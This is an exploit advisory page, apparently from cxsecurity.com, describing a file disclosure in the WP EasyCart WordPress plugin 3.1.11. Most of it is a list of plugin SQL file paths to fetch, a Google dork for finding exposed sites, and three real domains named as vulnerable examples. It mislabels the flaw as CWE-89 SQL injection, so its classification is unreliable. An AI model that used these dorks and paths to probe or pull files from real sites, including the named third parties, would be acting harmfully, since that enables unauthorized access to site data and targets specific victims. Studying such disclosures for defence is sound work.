WordPress WP EasyCart Plugins 3.1.11 Database Backup Disclosure

2018.12.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : WordPress WP EasyCart Plugins 3.1.11 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/12/2018 # Vendor Homepage : wpeasycart.com ~ wordpress.org # Software Download Link : github.com/wp-plugins/wp-easycart/archive/master.zip # Tested On : Windows and Linux # Category : WebApps # Version Information : 3.1.11 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/wp-easycart/inc/admin/sql/'' intext:''Full Frame by Catch Themes'' intext:''A SiteOrigin Theme'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/wp-easycart/inc/admin/sql/....... /PATH/wp-content/plugins/wp-easycart/inc/admin/sql/install_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/install_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/install_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/uninstall_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_0_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_10_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_11_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_12_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_13_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_14_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_15_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_16_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_17_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_18_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_19_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_1_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_20_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_21_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_22_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_23_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_24_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_25_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_26_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_27_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_28_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_29_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_2_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_3_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_4_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_5_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_6_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_7_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_8_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_1_9_to_1_30.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_31.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_31.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_32.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_33.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_34.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_35.sql /wp-content/plugins/wp-easycart/inc/admin/sql/upgrade_36.sql ################################################################################################# # Example Vulnerable Sites => [+] williamlulow.com/blog/wp-content/plugins/wp-easycart/inc/admin/sql/install_1_11.sql [+] datacash.ca/wp-content/plugins/wp-easycart/inc/admin/sql/install_1_30.sql [+] hysdfurniture.com/officefurniture/wp-content/plugins/wp-easycart/inc/admin/sql/install_1_30.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top